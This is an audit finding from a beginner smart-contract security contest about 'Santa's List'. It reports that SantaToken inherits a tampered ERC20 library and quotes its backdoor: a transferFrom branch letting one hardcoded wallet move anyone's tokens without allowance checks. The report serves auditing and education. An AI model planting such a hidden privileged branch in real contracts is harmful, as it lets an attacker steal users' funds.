First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Inheriting a malicious ERC20 base contract allows attacker to steal user's tokens

spacecowboy

Summary

The SantaToken contract wittingly or unwittingly inherits from a malicious ERC20 base contract that allows an attacker to steal user funds at will.

Vulnerability Details

The malicious contract contains the following malicious code in the ERC20::transferFrom method:

// hehehe :)
// https://arbiscan.io/tx/0xd0c8688c3bcabd0024c7a52dfd818f8eb656e9e8763d0177237d5beb70a0768d
if (msg.sender == 0x815F577F1c1bcE213c012f166744937C889DAF17) {
balanceOf[from] -= amount;
unchecked {
balanceOf[to] += amount;
}
emit Transfer(from, to, amount);
return true;
}

This code allows the attacker with the wallet address 0x815F577F1c1bcE213c012f166744937C889DAF17 to call transferFrom to move tokens from any address to any other address without the proper allowance checks.

Impact

User's funds are at risk

Tools Used

Manual review

Recommendations

Remove the reference to the malicious ERC20 token and double check that all other dependencies are free of malicious or faulty logic.

Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.